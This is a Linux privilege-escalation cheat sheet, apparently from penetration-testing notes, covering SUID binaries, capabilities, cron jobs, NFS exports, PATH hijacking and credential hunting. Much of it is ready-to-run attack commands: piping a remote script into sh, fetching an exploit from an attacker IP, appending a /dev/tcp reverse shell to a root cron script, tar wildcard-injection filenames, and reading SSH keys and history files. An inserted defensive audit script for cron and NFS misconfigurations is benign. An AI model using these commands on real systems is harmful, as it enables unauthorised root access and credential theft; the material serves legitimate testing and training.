
Linux Privilege Escalation

Advanced techniques for Linux privilege escalation: SUID, Kernel, Capabilities, and NFS

1. Automated Enumeration

Run these first rather than checking everything by hand, but read their output carefully yourself.

  • LinPEAS: The gold standard.
    BASH
    curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
  • LinEnum: Older but reliable.
    BASH
    ./LinEnum.sh -t
  • Linux Exploit Suggester: For kernel exploits.
    BASH
    ./linux-exploit-suggester.sh

2. Kernel Exploits (The "Hail Mary")

Use only after the misconfiguration-based paths below have failed: a kernel exploit can crash the box.

  1. Check Version: uname -a, cat /etc/issue, cat /proc/version.
  2. Search: searchsploit linux kernel <version>.
  3. Compile & Run:
    BASH
    # On attacker machine
    gcc -m32 -o exploit exploit.c # If target is 32-bit
    gcc -o exploit exploit.c      # If target is 64-bit
    
    # Transfer to target (curl, wget, netcat)
    wget http://<IP>:8000/exploit
    chmod +x exploit
    ./exploit
    • Common Exploits: DirtyCow (CVE-2016-5195), PwnKit (CVE-2021-4034), DirtyPipe (CVE-2022-0847).

3. SUID/SGID Binaries

Executables that run with the permissions of the file owner (often root) rather than those of the user who launches them.

  • Find SUID:
    BASH
    find / -perm -u=s -type f 2>/dev/null
  • GTFOBins: If you see a standard binary (gym, cp, find, vim) in the list, check GTFOBins.
    • Example (Find):
      BASH
      find . -exec /bin/sh -p \; -quit
    • Example (Systemctl): Create a service file whose ExecStart runs a reverse shell, then register it with systemctl link.
    • Custom Binaries: Run strings <binary> or ltrace <binary> to see if it calls other system binaries without absolute paths (Path Hijacking).

4. Capabilities

Granular permissions that act like SUID but are harder to spot.

  • Find Capabilities:
    BASH
    getcap -r / 2>/dev/null
  • Dangerous Caps:
    • cap_setuid+ep: Process can change UID (become root).
      BASH
      # If python has this cap:
      python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
    • cap_dac_read_search+ep: Bypass file read checks (Read shadow file).

5. Cron Jobs

Scheduled tasks running as root.

  • Check: cat /etc/crontab, ls -la /etc/cron.d, systemctl list-timers.
  • Vectors:
    1. Writable Script: If a script running as root is writable by you, overwrite it with a reverse shell.
      BASH
      echo "bash -i >& /dev/tcp/<IP>/4444 0>&1" >> /path/to/script.sh
    2. Wildcard Injection: If the command uses * (e.g., tar *), you can create files named like flags (e.g., --checkpoint=1) to execute commands.
      BASH
      touch /path/to/backup/--checkpoint=1
      touch /path/to/backup/--checkpoint-action=exec=sh\ shell.sh

6. NFS Root Squashing

If /etc/exports has no_root_squash, you can mount the share and create a SUID binary as root.

  1. Enumerate: cat /etc/exports on the target, or showmount -e <target> from the attacker machine.
  2. Mount:
    BASH
    mkdir /tmp/nfs
    mount -t nfs <IP>:/share /tmp/nfs
  3. Exploit:
    BASH
    # On attacker (as root)
    cp /bin/bash /tmp/nfs/bash
    chmod +s /tmp/nfs/bash
    
    # On target
    /share/bash -p
    # You are now root.

7. Path Hijacking

If a script running as root calls a binary by bare name (e.g., gzip instead of /bin/gzip), the name is resolved through PATH, so a directory you control that appears earlier in PATH wins.

  1. Identify: strings script -> calls gzip.
  2. Exploit:
    BASH
    cd /tmp
    echo "/bin/bash" > gzip
    chmod +x gzip
    export PATH=/tmp:$PATH
    ./vulnerable_script
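A defender-side audit for the misconfigurations behind sections 5, 6 and 7 (cron jobs whose target is world-writable, jobs that resolve commands through PATH, tar run on a shell wildcard, and exports with no_root_squash). This is added example code, not part of the original cheat sheet; the function names and the fixture files are hypothetical, and the checks only read the file paths you hand them, so point them at a copy of /etc/exports and /etc/crontab.

```bash
#!/usr/bin/env bash
# Hypothetical audit helpers (added example, not from the original page).
# Each function reads the file you pass in, prints one line per finding and returns 1 if it found anything.
# Section 6: exports that disable root squashing.
audit_exports() {
    local found=0 line
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        if printf '%s\n' "$line" | grep -q 'no_root_squash'; then
            echo "EXPORTS: no_root_squash on: $line"; found=1
        fi
    done < "$1"
    return "$found"
}

# Sections 5 and 7: system-crontab lines (min hour dom mon dow user command).
audit_crontab() {
    local found=0 line cmd prog
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        printf '%s\n' "$line" | grep -Eq '^[A-Za-z_][A-Za-z0-9_]*=' && continue  # MAILTO=, PATH=
        cmd=$(printf '%s\n' "$line" | awk '{ for (i = 7; i <= NF; i++) printf "%s%s", $i, (i < NF ? " " : "\n") }')
        [ -n "$cmd" ] || continue
        prog=${cmd%% *}
        case "$prog" in
            /*) # absolute path: flag a job whose target anyone can overwrite
                [ -e "$prog" ] && [ "$(ls -ld "$prog" | cut -c9)" = "w" ] &&
                    { echo "CRON: world-writable job target: $prog"; found=1; } ;;
            *)  # bare name: resolved through cron's PATH (shell builtins such as cd are reported too)
                echo "CRON: job resolves '$prog' through PATH: $cmd"; found=1 ;;
        esac
        printf '%s\n' "$cmd" | grep -Eq '(^|[[:space:];&|])tar[[:space:]].*\*' &&
            { echo "CRON: tar invoked with a shell wildcard: $cmd"; found=1; }
    done < "$1"
    return "$found"
}

# Constructed fixture (sample data, not a real host) so the checks run offline.
make_fixture() {
    printf '/srv/share *(rw,sync,no_root_squash)\n/srv/ro 10.0.0.0/24(ro,root_squash)\n' > "$1/exports"
    printf '#!/bin/sh\necho hi\n' > "$1/backup.sh"; chmod 777 "$1/backup.sh"
    printf 'MAILTO=root\n* * * * * root %s/backup.sh\n0 2 * * * root cd /srv/backup && tar czf /tmp/b.tgz *\n30 1 * * * root /usr/bin/true\n' "$1" > "$1/crontab"
}

# "bash audit.sh --demo" runs both checks against the constructed fixture.
if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d); make_fixture "$d"
    audit_exports "$d/exports"; audit_crontab "$d/crontab"; rm -rf "$d"
fi
```

The PATH check is deliberately noisy: every job whose first word is not an absolute path is listed, so review the hits rather than treating each as a confirmed finding.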

8. Passwords & Keys

  • History Files: cat ~/.bash_history
  • Config Files: grep -r "password" /var/www/html
  • SSH Keys: Check ~/.ssh/id_rsa, /root/.ssh/authorized_keys (if readable).